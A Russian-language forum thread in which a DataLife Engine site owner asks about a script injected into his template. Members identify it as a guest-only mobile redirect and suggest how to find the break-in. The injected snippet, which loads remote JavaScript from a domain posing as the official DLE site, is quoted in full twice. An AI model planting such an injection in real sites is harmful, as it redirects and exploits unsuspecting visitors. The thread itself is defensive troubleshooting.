Левый скрипт на сайте

Ivan · 12 Мар 2018

Здраствуйте!
появился на моєм сайте в фйле main вот такой скрипт:

[group=5]<script type="application/javascript">
document.write('<script type="application/javascript" src="//jquery.dle-news.su/Fpnp6f?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'"><' + '/script>');
</script>[/group]

возможно ктото с ним уже сталкивался,что он делает?
Заранее спасибо!

P/S
само собой что вот этот чудо скрипт удалил, просто интересно что он делает...

Анна · 12 Мар 2018

Ivan написал(а):
Здраствуйте!
появился на моєм сайте в фйле main вот такой скрипт:

[group=5]<script type="application/javascript">
document.write('<script type="application/javascript" src="//jquery.dle-news.su/Fpnp6f?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'"><' + '/script>');
</script>[/group]

возможно ктото с ним уже сталкивался,что он делает?
Заранее спасибо!

P/S
само собой что вот этот чудо скрипт удалил, просто интересно что он делает...

Скорей всего от этого скрипта работает что-то в шаблоне. Для незарегистрированных пользователей. Выйдите из админки и посмотрите что изменилось в шаблоне.

Ivan · 12 Мар 2018

Анна написал(а):
Скорей всего от этого скрипта работает что-то в шаблоне. Для незарегистрированных пользователей. Выйдите из админки и посмотрите что изменилось в шаблоне.

проблема в том что AI-Bolit ругает этот скрипт а раньше такого не было + в шаблоне никакой разницы не вижу (кэш чистил)

Анна · 12 Мар 2018

Ivan написал(а):
проблема в том что AI-Bolit ругает этот скрипт а раньше такого не было + в шаблоне никакой разницы не вижу (кэш чистил)

Просто если скрипт, то может влиять на какую то форму, слайдер и подобные штуки. Так что аккуратней. Надо смотреть, что у вас в шаблоне есть для незарегистрированных пользователей.

Ivan · 12 Мар 2018

Анна написал(а):
Просто если скрипт, то может влиять на какую то форму, слайдер и подобные штуки. Так что аккуратней. Надо смотреть, что у вас в шаблоне есть для незарегистрированных пользователей.

Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)

sobakatochkaru · 12 Мар 2018

Мда, удалили - супер! Ищете теперь дыру через которую вам это вставили в шаб. Эта кака - мобильный редирект. Что интересно теперь его домен маскируется под офсайт dle-news прописали видимо ip-шки их) Уже попадался на некоторых сайтах мне, ищите шелы у себя.

sobakatochkaru · 12 Мар 2018

Ivan написал(а):
Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)

С головой всё в порядке? Вы же сами писали - появился сам, в тегах - только для гостей, т.е. зареганный и тем более админ ничего не заметит, верни эту строку обратно и зайди с мобильного инета на сайт свой и разлогинись - думаю офигеешь, хотя хрен его знает может и рандомно срабатывать будет. Но фильтр от ПС этот скрипт тебе гарантирует)

Анна · 12 Мар 2018

Ivan написал(а):
Понятно, то есть этот скрипт не является вредоносним
Спасибо за помощь =)

Я не утверждаю, что он не вредосный. А просто предполагаю, что может быть скрипт от шаблона. Но выше вам уже ответили.

Ivan · 12 Мар 2018

sobakatochkaru написал(а):
С головой всё в порядке? Вы же сами писали - появился сам, в тегах - только для гостей, т.е. зареганный и тем более админ ничего не заметит, верни эту строку обратно и зайди с мобильного инета на сайт свой и разлогинись - думаю офигеешь, хотя хрен его знает может и рандомно срабатывать будет. Но фильтр от ПС этот скрипт тебе гарантирует)

Спасибо за помощь
Дело в том что сегодня тяжелый день, и голова плохо варит ..

MexaHu3aToP · 12 Мар 2018

Вас не смущает dle-news.su? Скорей всего Брут, админка по стандартному адресу? example.ru/admin.php?

Ivan · 12 Мар 2018

MexaHu3aToP написал(а):
Вас не смущает dle-news.su? Скорей всего Брут, админка по стандартному адресу? example.ru/admin.php?

Угу, админка была по стандартному адресу, теперь уже нет +))

sobakatochkaru · 12 Мар 2018

MexaHu3aToP написал(а):
Скорей всего Брут, админка по стандартному адресу? example.ru/admin.php?

Навряд ли, скорее всего Баг Фиксы » DataLife Engine (DLE) — система управления сайтом и контентом. Официальный сайт. не исправлены, как вариант установлены бесплатные паблик модули, те же подборки, тот же catmeta и т.д. А в админке - ну проверьте авторизовывался ли кто то не с вашего ip - ссылка-новый-адрес-админки.php?mod=logs ну думаю только свой найдёте) или своей подсети если динамический.

MakcoN · 13 Мар 2018

@Ivan, В каком файле нашел?

wawe · 13 Мар 2018

MakcoN написал(а):
@Ivan, В каком файле нашел?

Ivan написал(а):
появился на моєм сайте в фйле main вот такой скрипт

Ivan · 13 Мар 2018

sobakatochkaru написал(а):
Навряд ли, скорее всего Баг Фиксы » DataLife Engine (DLE) — система управления сайтом и контентом. Официальный сайт. не исправлены, как вариант установлены бесплатные паблик модули, те же подборки, тот же catmeta и т.д. А в админке - ну проверьте авторизовывался ли кто то не с вашего ip - ссылка-новый-адрес-админки.php?mod=logs ну думаю только свой найдёте) или своей подсети если динамический.

Админку взломали, я нашел там левый айпи, но пройтись по дирам всеравно нужно, мало ли что может выползти =) :agree:

MexaHu3aToP · 13 Мар 2018

Ivan написал(а):
Админку взломали, я нашел там левый айпи, но пройтись по дирам всеравно нужно, мало ли что может выползти =)

Если бы был доступ к файлам движка, я бы на его месте не ставил js код в шаблон. Можешь время не терять, с движком все нормально.

Левый скрипт на сайте

Ivan

Новичок

Анна

Модератор

Ivan

Новичок

Анна

Модератор

Ivan

Новичок

sobakatochkaru

Новичок

sobakatochkaru

Новичок

Анна

Модератор

Ivan

Новичок

MexaHu3aToP

Новичок

Ivan

Новичок

sobakatochkaru

Новичок

MakcoN

Приватовец

wawe

Новичок

Ivan

Новичок

MexaHu3aToP

Новичок

Similar Threads